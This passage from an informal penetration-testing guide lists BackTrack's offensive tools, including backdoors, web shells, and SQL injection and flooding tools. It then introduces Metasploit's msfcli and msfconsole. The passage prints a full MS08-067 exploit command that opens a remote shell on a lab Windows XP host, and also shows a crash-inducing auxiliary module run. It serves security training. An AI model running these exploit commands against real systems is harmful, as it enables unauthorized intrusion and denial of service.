ii  samdump2  1.1.1-1  Dump Windows 2k/NT/XP password hashes
ii  sapyto  0.99-bt0  SAP Penetration Testing Framework
ii  sbd  1.37-bt1  Secure Backdoor Netcat clone
ii  scalpel  2.0-bt2  A fast file carver that reads a database of header and footer definitions and extracts matching files or data fragments from a set of image files or raw d
ii  scapy  2.1.0-bt1  Scapy is a powerful packet manipulation tool and supports multiple protocols.
ii  screen  4.0.3-14ubuntu1.2  terminal multiplexor with VT100/ANSI terminal emulation
ii  screen-resolution-extra  0.13  Extension for the GNOME screen resolution applet
ii  scrollkeeper  0.8.1-4ubuntu1  Transitional package for scrollkeeper
ii  scrounge-ntfs  0.9-bt0  A data recovery program for NTFS filesystems.
ii  sctpscan  12.0-bt2  SCTPscan can scan networks for SCTP aware machines and open ports.
ii  securityfocus  1.0-bt1  Firefox link to SecurityFocus.com.
ii  sed  4.2.1-6  The GNU sed stream editor
ii  sensible-utils  0.0.1ubuntu3  Utilities for sensible alternative selection
ii  set  1.3.5-bt4  The Social-Engineer Toolkit (SET) is an open source, python driven tool for penetration testers.
ii  sfuzz  0.7.0alpha-bt2  simple fuzz is exactly what it sounds like - a simple fuzzer. don't mistake simple with a lack of fuzz capability. this fuzzer has two network modes of op
ii  sgml-base  1.26  SGML infrastructure and SGML catalog file support
ii  sgml-data  2.0.4  common SGML and XML data
ii  shared-mime-info  0.71-1ubuntu2  FreeDesktop.org shared MIME database and spec
ii  sharutils  1:4.6.3-4  shar, unshar, uuencode, uudecode
ii  shodan  1.0-bt2  Firefox link to ShodanHQ.com.
ii  sickfuzz  0.3-bt0  A fuzzer made out of several custom .spk files.
ii  siege  2.70-bt1  Siege is an http load testing and benchmarking utility.
ii  sipcrack  0.3-bt2  SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol
ii  sipp  3.2-bt0  SIPp is a free Open Source test tool, traffic generator for the SIP protocol
ii  sipsak  0.9.6-bt0  A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications.
ii  sipscan  0.1-bt1  A fast network scanner for UDP-SIP clients.
ii  sipvicious  0.2.6-bt0  SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems.
ii  skipfish  2.00-bt0  A fully automated, active web application security reconnaissance tool.
ii  sleuthkit  3.2.1-bt0  The Sleuth Kit (TSK) is a C library and a collection of command line tools. Autopsy is a graphical interface to TSK. TSK can be integrated into automated
ii  smap  0.6.0-bt0  A simple scanner for SIP enabled devices.
ii  smbclient  2:3.4.7~dfsg-1ubuntu3.6  command-line SMB/CIFS clients for Unix
ii  smistrip  0.4.8+dfsg2-2  extract MIB from text files like RFC
ii  smtp-user-enum  1.2-bt0  Username guessing tool primarily for use against the default Solaris SMTP service
ii  smtprc  2.0.3-bt0  A network open mail relay checker.
ii  smtpscan  0.5-bt0  A tool to guess which MTA is used by sending several "special" SMTP requests.
ii  sniffjoke  0.4.1-bt1  SniffJoke is an application for Linux that transparently handles your TCP connection, delaying, modifying and injecting fake packets inside your transmission,
ii  snmp  5.4.2.1~dfsg0ubuntu1-0ubuntu2.1  SNMP (Simple Network Management Protocol) applications
ii  snmp-mibs-downloader  1.0  Install and manage Management Information Base (MIB) files
ii  snmpcheck  1.8-bt2  Like snmpwalk, snmpcheck enumerates information via the SNMP protocol.
ii  snmpenum  1.0-bt2  Simple Perl script to enumerate information on Machines that are running SNMP
ii  snort  2.8.5.2-2build1  flexible Network Intrusion Detection System
ii  snort-common  2.8.5.2-2build1  flexible Network Intrusion Detection System [common files]
ii  snort-common-libraries  2.8.5.2-2build1  flexible Network Intrusion Detection System ruleset
ii  snort-rules-default  2.8.5.2-2build1  flexible Network Intrusion Detection System ruleset
ii  socat  1.7.1.3-bt2  socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial li
ii  sox  14.3.0-1.1build1  Swiss army knife of sound processing
ii  spamhole  0.4-bt0  spamhole is a fake open SMTP relay, intended to stop (some) spam by convincing spammers that it is delivering spam messages for them, when in fact it is
ii  spike  2.9-bt5  A powerful network fuzzer.
ii  sqlbrute  1.0-bt3  Multi-threaded blind SQL injection bruteforcer.
ii  sqlite  2.8.17-6build2  command line interface for SQLite
ii  sqlite3  3.6.22-1  A command line interface for SQLite 3
ii  sqlmap  0.9-bt2  sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end d
ii  sqlninja  0.2.6-bt0  Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server.
ii  squashfs-tools  1:4.0-6ubuntu1  Tool to create and append to squashfs filesystems
ii  ssidsniff  0.53-bt2  A curses based tool that allows identification, classification and data capturing of wireless networks. The interface is inspired by the unix top(1) utili
ii  ssl-cert  1.0.23ubuntu2  simple debconf wrapper for OpenSSL
ii  ssldump  0.9b3-bt0  An SSLv3/TLS network protocol analyzer.
ii  sslh  1.8rc4-bt0  Lets one accept both HTTPS and SSH connections on the same port.
ii  sslscan  1.8.2-bt2  SSLScan determines what ciphers are supported on SSL-based services, such as HTTPS. Furthermore, SSLScan will determine the preferred ciphers of the SSL se
ii  sslsniff  0.7-bt0  Designed to MITM all SSL connections on a LAN and dynamically generate certs.
ii  sslstrip  0.8-bt0  Transparently hijacks HTTP traffic on a network.
ii  stegdetect  0.6-bt0  Stegdetect is an automated tool for detecting steganographic content in images. It is capable of detecting several different steganographic methods to emb
ii  strace  4.5.19-2  A system call tracer
ii  stunnel4  4.35-bt2  The stunnel program is designed to work as an SSL encryption wrapper between remote client and local (inetd-startable) or remote servers. The goal is to f
ii  subversion  1.6.6dfsg-2ubuntu1.2  Advanced version control system
ii  sudo  1.7.2p1-1ubuntu5.3  Provide limited super user privileges to specific users
ii  swaks  20100211-bt0  A flexible, scriptable, transaction-oriented SMTP test tool.
ii  swig  1.3.40-2ubuntu1  Generate scripting interfaces to C/C++ code
ii  syslinux  2:3.63+dfsg-2ubuntu3  Bootloader for Linux/i386 using MS-DOS floppies
ii  sysv-rc  2.87dsf-4ubuntu17.2  System-V-like runlevel change mechanism
ii  sysv-rc-conf  0.99-6  SysV init runlevel configuration tool for the terminal
ii  sysvinit-utils  2.87dsf-4ubuntu17.2  System-V-like utilities
ii  tar  1.22-2ubuntu1  GNU version of the tar archiving utility
ii  tasksel  2.73ubuntu26  Tool for selecting tasks for installation on Debian systems
ii  tasksel-data  2.73ubuntu26  Official tasks used for installation of Debian systems
rc  tcl8.4  8.4.19-4  Tcl (the Tool Command Language) v8.4 - run-time files
ii  tcl8.5  8.5.8-2  Tcl (the Tool Command Language) v8.5 - run-time files
ii  tcpd  7.6.q-18  Wietse Venema's TCP wrapper utilities
ii  tcpdump  4.1.1-bt6  A powerful command-line packet analyzer.
ii  tcpflow  0.21.ds1-6  TCP flow recorder
ii  tcpreplay  3.4.4-bt0  Tcpreplay is a suite written by Aaron Turner for UNIX operating systems which gives you the ability to use previously captured traffic in libpcap format
ii  tcptraceroute  1.5beta7-bt3  tcptraceroute is a traceroute implementation using TCP packets.
ii  tcpxtract  1.0.1-5  extracts files from network traffic based on file signatures
ii  telnet  0.17-36build1  The telnet client
ii  testdisk  6.11.3-bt0  Powerful free data recovery software.
ii  testssl.sh  1.13-bt1  testssl.sh is a Unix command line tool which checks for the support of weak and medium (i.e. also weak) SSL ciphers and the old SSL version 2.
ii  tex-common  2.06ubuntu0.1  common infrastructure for building and installing TeX
ii  texlive-base  2009-7  TeX Live: Essential programs and files
ii  texlive-binaries  2009-5ubuntu0.2  Binaries for TeX Live
ii  texlive-common  2009-7  TeX Live: Base component
ii  texlive-doc-base  2009-2  TeX Live: TeX Live documentation
ii  texlive-latex-base  2009-7  TeX Live: Basic LaTeX packages
ii  texlive-latex-base-doc  2009-7  TeX Live: Documentation files for texlive-latex-base
ii  texlive-luatex  2009-7  TeX Live: LuaTeX packages
ii  thc-ipv6  1.4-bt1  A complete tool set to attack the inherent protocol weaknesses of IPV6.
ii  thc-pptp-bruter  0.1.4-bt0  Brute force program against pptp vpn endpoints (tcp port 1723).
ii  thcsslcheck  0.1-bt2  Windows tool that checks the remote ssl stack for supported ciphers and version.
ii  theharvester  2.0-bt1  theHarvester is a tool for gathering e-mail accounts and subdomain names from different public sources.
ii  time  1.7-23build1  The GNU time program for measuring cpu resource usage
ii  tinyproxy  1.8.2-bt1  Tinyproxy is a light-weight HTTP proxy daemon for POSIX operating systems. Designed from the ground up to be fast and yet small, it is an ideal solution f
rc  tk8.4  8.4.19-4  Tk toolkit for Tcl and X11, v8.4 - run-time files
ii  tk8.5  8.5.8-1  Tk toolkit for Tcl and X11, v8.5 - run-time files
ii  tofrodos  1.7.8.debian.1-2  Converts DOS <-> Unix text files, alias tofromdos
ii  traceroute  2.0.13-bt2  This is a new modern implementation of traceroute(8) utility for Linux systems.
ii  truecrypt  7.0-bt4  open-source disk encryption software
ii  tsconf  1.0-7build1  touch screen library common files
ii  ttf-dejavu  2.30-2  Metapackage to pull in ttf-dejavu-core and ttf-dejavu-extra
ii  ttf-dejavu-core  2.30-2  Vera font family derivate with additional characters
ii  ttf-dejavu-extra  2.30-2  Vera font family derivate with additional characters
ii  ttf-droid  1.00~b112+dfsg+1-0ubuntu1  handheld device font with extensive style and language support
ii  ttf-dustin  20030517-7  Various TrueType fonts from dustismo.com
ii  ttf-freefont  20090104-5  Freefont Serif, Sans and Mono Truetype fonts
ii  ttf-liberation  1.05.2.20091019-4  Fonts with the same metrics as Times, Arial and Courier
ii  ttf-mscorefonts-installer  3.2ubuntu0.1  Installer for Microsoft TrueType core fonts
ii  ttf-symbol-replacement  1.2.2-0ubuntu2~lucid1  Free font with the same metrics as Symbol
ii  ttf-umefont  411-1  Japanese TrueType font, Ume-font
ii  ttf-unfonts-core  1.0.1-7ubuntu1  Un series Korean TrueType fonts
ii  tzdata  2011g-0ubuntu0.10.04  time zone and daylight-saving time data
ii  tzdata-java  2011g-0ubuntu0.10.04  time zone and daylight-saving time data for use by java runtimes
ii  ua-tester  1.06-bt2  This tool is designed to automatically check a given URL using a list of standard and non-standard User Agent strings provided by the user (1 per line).
ii  ubuntu-keyring  2010.11.09  GnuPG keys of the Ubuntu archive
ii  ubuntu-serverguide  10.04.3  The Ubuntu Server Guide
ii  ubuntu-system-service  0.1.20.1  Dbus service to set various system-wide configurations
ii  ucf  3.0025  Update Configuration File: preserve user changes to config files.
ii  udev  151-12.3  rule-based device node and kernel event manager
ii  udisks  1.0.1-1ubuntu1  abstraction for enumerating block devices
ii  udp.pl  1.0-bt2  UDP flooder.
ii  udptunnel  r16-bt2  Tunnels TCP over UDP packets.
ii  ufw  0.30pre1-0ubuntu2  program for managing a Netfilter firewall
ii  unetbootin-bt  1.0-bt0  UNetbootin allows you to create bootable Live USB drives for Ubuntu, Fedora, and other Linux distributions without burning a CD.
ii  untidy  beta2-bt1  untidy is a general purpose XML Fuzzer.
ii  unzip  6.0-1build1  De-archiver for .zip files
ii  update-inetd  4.35ubuntu0.1  inetd configuration file updater
ii  update-manager-core  1:0.134.11  manage release upgrades
ii  update-notifier-common  0.99.3  Files shared between update-notifier and adept
ii  upower  0.9.1-1  abstraction for power management
ii  upstart  0.6.5-8  event-based init daemon
ii  ureadahead  0.100.0-4.1.3  Read required files in advance
ii  usbmuxd  1.0.2-1ubuntu2  USB multiplexor daemon for iPhone and iPod Touch devices
ii  usbutils  0.86-2ubuntu1  Linux USB utilities
ii  user-setup  1.28ubuntu7  Set up initial user and password
ii  util-linux  2.17.2-0ubuntu1.10.04.2  Miscellaneous system utilities
ii  uuid-runtime  2.17.2-0ubuntu1.10.04.2  runtime components for the Universally Unique ID library
ii  v86d  0.1.9-1ubuntu1  daemon to run x86 code in an emulated environment
ii  vbetool  1.1-2  run real-mode video BIOS code to alter hardware state
ii  videojak  2.00-bt3  VideoJak is an IP Video security assessment tool that can simulate a proof of concept video interception or replay test.
ii  vim  2:7.2.330-1ubuntu3  Vi IMproved - enhanced vi editor
ii  vim-common  2:7.2.330-1ubuntu3  Vi IMproved - Common files
ii  vim-runtime  2:7.2.330-1ubuntu3  Vi IMproved - Runtime files
ii  vim-tiny  2:7.2.330-1ubuntu3  Vi IMproved - enhanced vi editor - compact version
ii  vinetto  0.7-bt2  Vinetto is a forensics tool to examine Thumbs.db files.
ii  vlan  1.9-3ubuntu3  user mode programs to enable VLANs on your ethernet devices
ii  voiper  0.07-bt3  VoIPER is a security toolkit that aims to allow developers and security researchers to easily, extensively and automatically test VoIP devices for securit
ii  voiphopper  1.0-bt0  VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific Ethernet switches. VoIP Hopper d
ii  voipong  2.0-bt1  utility which detects all Voice Over IP calls on a pipeline
ii  volatility  1.3-bt1  A completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile m
ii  w3af  1.0-rc5-bt2  w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that
ii  w3m  0.5.2-2.1ubuntu1.2  WWW browsable pager with excellent tables/frames support
ii  waffit  0.9.0-bt1  WAFW00F allows one to identify and fingerprint WAF products protecting a website.
ii  wapiti  2.2.1-bt2  Web application vulnerability scanner, & security auditor.
ii  warvox  1.0.1-bt1  WarVOX is a suite of tools for exploring, classifying, and auditing telephone systems.
ii  wbar  1.3.3+dfsg2-1  light and fast launch bar
ii  wbarconf  0.7.2-bt2  wbar configuration gui written with Python and GTK.
ii  websecurify  0.8-bt0  Websecurify is a powerful web application security testing environment designed from the ground up to provide the best combination of automatic and manual
ii  webshag  1.10-bt3  Webshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing l
ii  webshells  1.0-bt1  collection of web shells
ii  webslayer  rev5-bt0  A tool designed for bruteforcing Web Applications.
ii  weevely  0.3-bt0  Weevely generates PHP code to trojanize a web server, and acts like a client to establish a telnet-like connection or inject additional functions on backdo
ii  wepcrack  0.1-bt2  WEPCrack is an open source tool for breaking 802.11 WEP secret keys.
ii  wfuzz  1.4c-bt1  Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), brutefo
ii  wget  1.12-1.1ubuntu2.1  retrieves files from the web
ii  whatweb  0.4.7-bt3  WhatWeb identifies websites.
ii  whiptail  0.52.10-5ubuntu1  Displays user-friendly dialog boxes from shell scripts
ii  wicd  1.7.0+ds1-2  wired and wireless network manager - metapackage
ii  wicd-daemon  1.7.0+ds1-2  wired and wireless network manager - daemon
ii  wicd-gtk  1.7.0+ds1-2  wired and wireless network manager - GTK+ client
ii  wifitap  0.4.0-bt2  WiFi injection tool through tun/tap device
ii  winbind  2:3.4.7~dfsg-1ubuntu3.6  Samba nameservice integration server
ii  windows-binaries  1.0-bt0  Various windows pentesting binaries.
ii  wine  1.2.2-0ubuntu2~lucid1  Microsoft Windows Compatibility Layer (dummy package)
ii  wine1.2  1.2.2-0ubuntu2~lucid1  Microsoft Windows Compatibility Layer (Binary Emulator and Library)
ii  wine1.2-gecko  1.0.0-0ubuntu4  Microsoft Windows Compatibility Layer (Web Browser)
ii  wireless-crda  1.12  Wireless Central Regulatory Domain Agent
ii  wireless-tools  30~pre9-3ubuntu4  Tools for manipulating Linux Wireless Extensions
ii  wireshark  1.4.7-bt0  A network "sniffer" - a tool that captures and analyzes packets off the wire.
ii  wordlists  1.0-bt0  wordlists
ii  wpasupplicant  0.6.9-3ubuntu3  client support for WPA and WPA2 (IEEE 802.11i)
ii wstool
0.14001-bt4
WSTOOL is OS-independence Web vulnerable scanner.
ii x-ttcidfont-conf
32
TrueType and CID fonts configuration for X
ii x11-apps
X applications

7.5+1ubuntu2

ii x11-common
X Window System (X.Org) infrastructure

1:7.5+5ubuntu1

ii x11-session-utils
X session utilities

7.5+1

ii x11-utils
X11 utilities

7.5+3

ii x11-xfs-utils
X font server utilities

7.4+1build2

ii x11-xkb-utils
X11 XKB utilities

7.5+1

ii x11-xserver-utils
X server utilities

7.5+1ubuntu2.1

ii x11proto-core-dev
7.0.16-1
X11 core wire protocol and auxiliary headers
ii x11proto-input-dev
X11 Input extension wire protocol

2.0-2

ii x11proto-kb-dev
X11 XKB extension wire protocol

1.0.4-1

ii xauth
X authentication utility

1:1.0.4-1

ii xbase-clients
miscellaneous X clients - metapackage

1:7.5+5ubuntu1

ii xbitmaps
Base X bitmaps

1.1.0-1

ii xdg-utils
1.0.2-6.1ubuntu3.1
desktop integration utilities from freedesktop.org
ii xfonts-base
standard fonts for X

1:1.0.1

ii xfonts-encodings
Encodings for X.Org fonts

1:1.0.3-1

ii xfonts-utils
X Window System font utility programs

1:7.5+2

ii xgps
1.1.5-bt0
xGPS is a free project aiming to bring powerful and easy to use navigation
software
ii xinit
X server initialisation tool

1.2.0-1

ii xkb-data
1.8-1ubuntu8.1~10.04.1
X Keyboard Extension (XKB) configuration data
ii xml-core
0.13
XML infrastructure and XML catalog file support
ii xplico
0.6.3-bt0
The goal of Xplico is extract from an internet traffic capture the
applications data contained.
ii xprobe2
Active OS fingerprinting tool.

2.1-bt2

ii xresprobe
X Resolution Probe

0.4.24ubuntu9

ii xserver-common
common files used by various X servers

2:1.7.6-2ubuntu7.6

ii xserver-xephyr
nested X server

2:1.7.6-2ubuntu7.6

ii xserver-xorg
the X.Org X server

1:7.5+5ubuntu1

ii xserver-xorg-core
Xorg X server - core server

2:1.7.6-2ubuntu7.6

ii xserver-xorg-input-all
1:7.5+5ubuntu1
the X.Org X server -- input driver metapackage
ii xserver-xorg-input-evdev
X.Org X server -- evdev input driver

1:2.3.2-5ubuntu1

ii xserver-xorg-input-mouse
X.Org X server -- mouse input driver

1:1.5.0-1

ii xserver-xorg-input-synaptics
1.2.2-1ubuntu4
Synaptics TouchPad driver for X.Org server
ii xserver-xorg-input-vmmouse
1:12.6.5-4ubuntu2
X.Org X server -- VMMouse input driver to use with VMWare
ii xserver-xorg-input-wacom
X.Org X server -- Wacom input driver

1:0.10.5-0ubuntu4.1

ii xserver-xorg-video-all
1:7.5+5ubuntu1
the X.Org X server -- output driver metapackage
ii xserver-xorg-video-apm
X.Org X server -- APM display driver

1:1.2.2-1

ii xserver-xorg-video-ark
X.Org X server -- ark display driver

1:0.7.2-1

ii xserver-xorg-video-ati
1:6.13.0-1ubuntu5
X.Org X server -- AMD/ATI display driver wrapper
ii xserver-xorg-video-chips
X.Org X server -- Chips display driver

1:1.2.2-1

ii xserver-xorg-video-cirrus
X.Org X server -- Cirrus display driver

1:1.3.2-1ubuntu1

ii xserver-xorg-video-fbdev
X.Org X server -- fbdev display driver

1:0.4.1-1ubuntu1

ii xserver-xorg-video-geode
2.11.11-1~lucid1
X.Org X server -- Geode GX2/LX display driver

ii xserver-xorg-video-i128
X.Org X server -- i128 display driver

1:1.3.3-1

ii xserver-xorg-video-i740
X.Org X server -- i740 display driver

1:1.3.2-1

ii xserver-xorg-video-intel
2:2.9.1-3ubuntu5
X.Org X server -- Intel i8xx, i9xx display driver
ii xserver-xorg-video-mach64
6.8.2-2
X.Org X server -- ATI Mach64 display driver
ii xserver-xorg-video-mga
X.Org X server -- MGA display driver

1:1.4.11.dfsg-2ubuntu1

ii xserver-xorg-video-neomagic
1:1.2.4-2
X.Org X server -- Neomagic display driver
ii xserver-xorg-video-nouveau
1:0.0.15+git20100219+9b4118d-0ubuntu5
X.Org X server -- Nouveau display driver (experimental)
ii xserver-xorg-video-nv
X.Org X server -- NV display driver

1:2.1.15-1ubuntu3

ii xserver-xorg-video-openchrome
X.Org X server -- VIA display driver

1:0.2.904+svn827-1

ii xserver-xorg-video-r128
6.8.1-2ubuntu1
X.Org X server -- ATI r128 display driver
ii xserver-xorg-video-radeon
1:6.13.0-1ubuntu5
X.Org X server -- AMD/ATI Radeon display driver
ii xserver-xorg-video-rendition
1:4.2.3-1
X.Org X server -- Rendition display driver
ii xserver-xorg-video-s3
1:0.6.3-1
X.Org X server -- legacy S3 display driver
ii xserver-xorg-video-s3virge
1:1.10.4-1
X.Org X server -- S3 ViRGE display driver
ii xserver-xorg-video-savage
X.Org X server -- Savage display driver

1:2.3.1-1ubuntu1

ii xserver-xorg-video-siliconmotion
1:1.7.3-1
X.Org X server -- SiliconMotion display driver
ii xserver-xorg-video-sis
X.Org X server -- SiS display driver

1:0.10.2-2

ii xserver-xorg-video-sisusb
1:0.9.3-1
X.Org X server -- SiS USB display driver

ii xserver-xorg-video-tdfx
X.Org X server -- tdfx display driver

1:1.4.3-1

ii xserver-xorg-video-trident
1:1.3.3-1
X.Org X server -- Trident display driver
ii xserver-xorg-video-tseng
X.Org X server -- Tseng display driver

1:1.2.3-1

ii xserver-xorg-video-v4l
1:0.2.0-4
X.Org X server -- Video 4 Linux display driver
ii xserver-xorg-video-vesa
X.Org X server -- VESA display driver

1:2.3.0-1ubuntu1

ii xserver-xorg-video-vmware
X.Org X server -- VMware display driver

1:10.16.9-1

ii xserver-xorg-video-voodoo
X.Org X server -- Voodoo display driver

1:1.2.3-1

ii xsltproc
XSLT command line processor

1.1.26-1ubuntu1

ii xssed
Firefox link to XSSED.com .

1.0-bt1

ii xsser
1.5-bt2
Cross Site "Scripter" is an automatic -framework- to detect, exploit and
report XSS vulnerabilities in web-based aplications.
ii xssfuzz
1.1-bt1
Its for finding new vectors and testing those within the context of
multiple encoding methods.
ii xterm
X terminal emulator

256-1ubuntu1

ii xtrans-dev
X transport library (development files)

1.2.5-1

ii xulrunner-1.9.2
0ubuntu0.10.04.1

1.9.2.17+build3+nobinonlyXUL + XPCOM application runner

ii xutils-dev
1:7.5+2
X Window System utility programs for development
ii xz-utils
XZ-format compression utilities

4.999.9beta+20091116-1

ii yelp
Help browser for GNOME

2.30.0-0ubuntu2

ii yersinia
0.7.1-bt0
A network tool designed to take advantage of some weakeness in different
network protocols.
ii zenity
2.30.0-0ubuntu1
Display graphical dialog boxes from shell scripts
ii zip
Archiver for .zip files

3.0-2

ii zlib1g
compression library - runtime

1:1.2.3.3.dfsg-15ubuntu1

ii zlib1g-dev
compression library - development

1:1.2.3.3.dfsg-15ubuntu1

End of the tools.

Chapter 2: The Metasploit Framework

This chapter introduces you to the most reputed framework of them all: the Metasploit Framework.
The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

For those who don't like history, let the game begin.

Terminology:

Exploit:
An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and configuration errors.

Payload:
A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt (see Chapter 5), whereas a bind shell is a payload that binds a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.

Shellcode:
Shellcode is a set of instructions used as a payload when exploitation occurs. Shellcode is typically written in assembly language. In most cases, a command shell or a Meterpreter shell will be provided after the series of instructions have been performed by the target machine, hence the name.

Module:
A module in the context of this book is a piece of software that can be used by the Metasploit Framework. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes the Framework so powerful.

Listener:
A listener is a component within Metasploit that waits for an incoming connection of some sort. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.

Metasploit Interfaces:

MSFconsole

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it's like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.
Although the Metasploit Framework is constantly changing, a subset of commands remain relatively constant. By mastering the basics of msfconsole, you will be able to keep up with any changes. To illustrate the importance of learning msfconsole, it will be used in nearly every chapter of the book.

To launch msfconsole, enter msfconsole at the command line:

To get help on a particular command, for example connect, you can use the console's help for that command:

And for those who are more graphically oriented and want to try a different approach, look for Armitage.

I would like to tell you guys that msfconsole is what most of the hackers use.
Msfcli

Msfcli provides a powerful command-line interface to the framework. Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.
_______________________________________________________________________
root@bt4:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.201
PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 676 exploits - 328 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11084 updated today (2010.11.21)
RHOST => 192.168.1.201
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.201
[*] Command shell session 1 opened (192.168.1.101:35009 -> 192.168.1.201:4444) at 2010-11-21 14:44:42 -0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck. That's why they say BackTrack is like giving a gun to monkeys.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

To display the payloads that are available for the current module, append the letter
'P' to the command-line string.
root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi
RHOST=192.168.1.115 P
[*] Please wait while we load the module tree...
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generate a debug trap in the target process
...snip...

The other options available to msfcli are available by issuing 'msfcli -h'.
Benefits of msfcli
Supports the launching of exploits and auxiliary modules
Useful for specific tasks
Good for learning
Convenient to use when testing or developing a new exploit
Good tool for one-off exploitation
Excellent if you know exactly which exploit and options you need
Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as
msfconsole and it can only handle one shell at a time, making it rather impractical for
client-side attacks. It also doesn't support any of the advanced automation features
of msfconsole.

The next section has been copy-pasted from Metasploit Unleashed, so the formatting is bad; I hope that you look for knowledge, not the format. The best way to learn the framework is to type the commands in the console while you go through the section.

Tab Completion
The msfconsole is designed to be fast to use and one of the features that helps this
goal is tab completion. With the wide array of modules available, it can be difficult to
remember the exact name and path of the particular module you wish to make use
of. As with most other shells, entering what you know and pressing 'Tab' will present
you with a list of options available to you or auto-complete the string if there is only
one option. Tab completion depends on the ruby readline extension and nearly every
command in the console supports tab completion.
use exploit/windows/dce
use .*netapi.*
set LHOST
show
set TARGET
set PAYLOAD windows/shell/
exp
msf > use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/msdns_zonename
msf > use exploit/windows/smb/ms08_067_netapi

The back Command

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however, is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally.


msf auxiliary(ms09_001_write) > back
msf >

The check Command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.114 yes The target address
RPORT 42 yes The target port

Exploit target:

Id Name
-- ----
0 Windows 2000 English
msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

The connect Command

There is a miniature netcat clone built into the msfconsole that supports SSL, proxies, pivoting, and file sends. By issuing the 'connect' command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.
msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
!
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)

DD-WRT login:

By passing the '-s' argument to connect, it will connect via SSL:
msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0
HTTP/1.1 302 Found
Date: Sat, 25 Jul 2009 05:03:42 GMT
Server: Apache/2.2.11
Location: http://www.metasploit.org/

exploit vs. run

When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.
msf auxiliary(ms09_001_write) > run
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
datalenlow=25535 dataoffset=65535 fillersize=72
rescue
...snip...

The irb Command

